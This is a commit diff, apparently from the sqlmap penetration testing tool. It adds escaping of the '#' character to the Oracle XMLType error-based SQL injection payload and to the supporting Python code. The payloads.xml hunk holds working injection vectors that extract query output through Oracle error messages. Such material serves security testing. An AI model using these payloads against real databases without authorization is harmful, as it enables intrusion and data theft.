Oracle's XMLType doesn't like '#' char too

stamparm · stamparm · commit ac5a752b1261 · 2012-03-01T11:59:37.000Z
diff --git a/lib/core/agent.py b/lib/core/agent.py
@@ -217,7 +217,8 @@ def cleanupPayload(self, payload, origValue=None):
         _ = (
                 ("[RANDNUM]", str(randInt)), ("[RANDNUM1]", str(randInt1)), ("[RANDSTR]", randStr),\
                 ("[RANDSTR1]", randStr1), ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
-                ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar)
+                ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
+                ("[HASH_REPLACE]", kb.chars.hash_)
             )
         payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
 
diff --git a/lib/core/option.py b/lib/core/option.py
@@ -1502,9 +1502,8 @@ def __setKnowledgeBaseAttributes(flushAll=True):
     kb.chars.delimiter = randomStr(length=6, lowercase=True)
     kb.chars.start = ":%s:" % randomStr(length=3, lowercase=True)
     kb.chars.stop = ":%s:" % randomStr(length=3, lowercase=True)
-    kb.chars.at = ":%s:" % randomStr(length=1, lowercase=True)
-    kb.chars.space = ":%s:" % randomStr(length=1, lowercase=True)
-    kb.chars.dollar = ":%s:" % randomStr(length=1, lowercase=True)
+
+    kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = (":%s:" % _ for _ in randomStr(length=4, lowercase=True))
 
     if flushAll:
         kb.headerPaths = {}
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
@@ -180,7 +180,7 @@ def __errorReplaceChars(value):
     retVal = value
 
     if value:
-        retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@")
+        retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@").replace(kb.chars.hash_, "#")
 
     return retVal
 
diff --git a/xml/payloads.xml b/xml/payloads.xml
@@ -1242,7 +1242,7 @@ Formats:
         <risk>0</risk>
         <clause>1</clause>
         <where>1</where>
-        <vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
+        <vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
         <request>
             <payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
         </request>

Original file line number	Diff line number	Diff line change
`@@ -217,7 +217,8 @@ def cleanupPayload(self, payload, origValue=None):`
`217`	`217`	`_ = (`
`218`	`218`	`("[RANDNUM]", str(randInt)), ("[RANDNUM1]", str(randInt1)), ("[RANDSTR]", randStr),\`
`219`	`219`	`("[RANDSTR1]", randStr1), ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\`
`220`		`- ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar)`
	`220`	`+ ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\`
	`221`	`+ ("[HASH_REPLACE]", kb.chars.hash_)`
`221`	`222`	`)`
`222`	`223`	`payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)`
`223`	`224`